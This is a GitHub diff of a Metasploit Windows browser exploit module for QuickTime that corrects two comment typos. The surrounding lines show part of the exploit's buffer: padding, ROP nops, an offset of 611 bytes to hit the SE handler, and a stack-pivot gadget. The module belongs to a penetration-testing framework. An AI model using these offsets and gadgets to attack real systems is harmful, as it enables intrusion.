File tree Expand file tree Collapse file tree 1 file changed +2
-2
lines changed
modules/exploits/windows/browser Expand file tree Collapse file tree 1 file changed +2
-2
lines changed Original file line number Diff line number Diff line change @@ -164,7 +164,7 @@ def rop_nop(t)
164
164
165
165
def exploit
166
166
buf = ''
167
- buf << rand_text_alpha ( 467 ) # 467 to algin the pivot
167
+ buf << rand_text_alpha ( 467 ) # 467 to align the pivot
168
168
10 . times {
169
169
buf << rop_nop ( target )
170
170
}
@@ -174,7 +174,7 @@ def exploit
174
174
] . pack ( 'V*' )
175
175
buf << rand_text_alpha ( 611 - buf . length ) # Offset 611 to hit SE Handler
176
176
buf << sort_bytes ( [ target . ret ] ) # ADD ESP,280; RET (QuickTime.qts) - pivot
177
- buf << rand_text_alpha ( 658 - buf . length ) # 658 bytes to padd up the mov file size
177
+ buf << rand_text_alpha ( 658 - buf . length ) # 658 bytes to pad up the mov file size
178
178
179
179
# Quicktime File Format Specifications:
180
180
# https://developer.apple.com/standards/qtff-2001.pdf
You can’t perform that action at this time.
0 commit comments